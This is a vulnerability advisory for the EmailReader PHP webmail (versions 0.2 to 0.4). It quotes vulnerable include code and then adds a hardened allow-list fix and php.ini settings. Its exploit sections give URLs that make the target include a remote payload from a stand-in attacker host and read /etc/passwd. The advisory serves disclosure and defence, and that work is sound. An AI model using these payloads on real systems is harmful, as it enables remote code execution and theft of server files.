Version : 0.2;0.3;0.4
Website : http://www.isoca.com/
Problems : Include file (local, remote)

Version: 0.2;0.3

File:
---------------------------------
email.php3 (version 0.2) ; email.php (version 0.3)
---------------------------------

PHP Code:
---------------------------------
[...]
require('emailreader.ini');
if ($login > "") {
  parse_str($param);
  include($cer_skin);   // path comes from a request-settable variable
  include('email.inc');
  $mbox = openimap($server, $username, $password);
  $text = htmlspecialchars(get_part($mbox,$msgid, "TEXT/PLAIN"));
[...]
---------------------------------

Exploit :
---------------------------------
http://[target]/email.php?login=attacker&cer_skin=http://[attacker]/code.php
--> include http://[attacker]/code.php on remote server

--- include local file -->
http://[target]/email.php?login=attacker&cer_skin=/etc/passwd
---------------------------------

Versions: 0.4

File:
---------------------------------
webmail/lib/emailreader_execute_on_each_page.inc.php
---------------------------------

PHP Code:
---------------------------------
[...]
$param = imap_base64($login);
parse_str($param);
@include($emailreader_ini);   // path comes from a request-settable variable
@include('lib/'.$server_type.'.inc.php');
@include('skin/emailreaderskin_'.$lang.'.php');
[...]
---------------------------------

Exploit :
---------------------------------
http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://[attacker]/code.php
--> include http://[attacker]/code.php on remote server

--- include local file -->
http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=/etc/passwd
---------------------------------

--
(if register_globals=ON)
--

--
magas@mail.lt
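
A hardened form of the include selection shown above, as an added example that is not part of the original advisory or the product's code. The skin names, file names, the `skin` request parameter and the `EMAILREADER_ENTRY` constant are hypothetical.

```php
<?php
declare(strict_types=1);

// Allow-list: request value -> file shipped with the application.
// Keys and file names are hypothetical, chosen for this example.
const SKINS = [
    'default' => 'skin/emailreaderskin_default.php',
    'en'      => 'skin/emailreaderskin_en.php',
    'fr'      => 'skin/emailreaderskin_fr.php',
];

/**
 * Map an untrusted skin name to an include path.
 * Anything that is not an exact allow-list key (URLs, absolute paths,
 * traversal sequences, arrays, null) falls back to the default skin,
 * so the request never contributes a single byte to the path.
 */
function resolve_skin($requested): string
{
    $key = (is_string($requested) && array_key_exists($requested, SKINS))
        ? $requested
        : 'default';
    return __DIR__ . '/' . SKINS[$key];
}

// Constructed sample inputs: the two values from the advisory plus others.
$samples = ['fr', 'http://[attacker]/code.php', '/etc/passwd',
            '../../etc/passwd', ['x'], null];
foreach ($samples as $value) {
    printf("%-32s => %s\n",
        json_encode($value, JSON_UNESCAPED_SLASHES),
        resolve_skin($value));
}

// Entry point (email.php): configuration path is a constant, the skin is
// read explicitly from the request instead of relying on register_globals.
//   define('EMAILREADER_ENTRY', true);
//   require __DIR__ . '/emailreader.ini';
//   include resolve_skin($_GET['skin'] ?? null);
//
// First line of every file under lib/ (for example
// emailreader_execute_on_each_page.inc.php), so a direct request to the
// include file stops before any include statement runs:
//   defined('EMAILREADER_ENTRY') || exit;
```

In `php.ini`, `register_globals = Off` (the directive was removed in PHP 5.4) and `allow_url_include = Off` close the request-variable and remote-URL paths independently of the code change.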